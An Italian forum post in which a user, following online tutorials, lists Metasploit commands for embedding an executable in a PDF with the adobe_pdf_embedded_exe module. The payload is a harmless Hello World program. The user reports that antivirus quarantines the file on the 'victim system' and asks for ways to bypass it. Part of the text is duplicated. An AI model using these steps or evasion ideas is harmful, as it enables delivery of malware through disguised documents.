Ciao ragazzi. Sto cercando, seguendo qualche tutorial in rete, di embeddare un exe all'interno di un file pdf, tramite metaxploit.
Il problema è che, all'aperture dello stesso, sul sistema vittima, l'antivirus detecta il modello "TR/PAtched.Gen2" e lo muove in quarantena. Considerando che il payload è un semplice "Hello World", e quindi non è rilevante a livello di criticità del codice, ne devo dedurre che questo tipo di "attacco" non è piu fattibile?
Alternativamente sapreste indicarmi qualche tutorial dove viene spiegato come bypasare l'av?
questi sono gli step che ho eseguito per la creazione del file:
questo è il contenuto dell'eseguibile:
Il problema è che, all'aperture dello stesso, sul sistema vittima, l'antivirus detecta il modello "TR/PAtched.Gen2" e lo muove in quarantena. Considerando che il payload è un semplice "Hello World", e quindi non è rilevante a livello di criticità del codice, ne devo dedurre che questo tipo di "attacco" non è piu fattibile?
Alternativamente sapreste indicarmi qualche tutorial dove viene spiegato come bypasare l'av?
questi sono gli step che ho eseguito per la creazione del file:
msfconsole
search type:exploit platform:windows adobe pdf
use exploit/windows/fileformat/adobe_pdf_embedded_exe
set payload generic/custom
set payloadfile /home/kali/Scrivania/payload custom/hello/out
set FILENAME out.pdf
exploit
mv /root/.msf4/local/out.pdf /home/kali/Scrivania/export.pdf
chmod +x export.pdf
chmod +w export.pdf
chmod +r export.pdfquesto è il contenuto dell'eseguibile:
Codice:
#include <stdio.h>
int main(){
printf("this is my payload");
}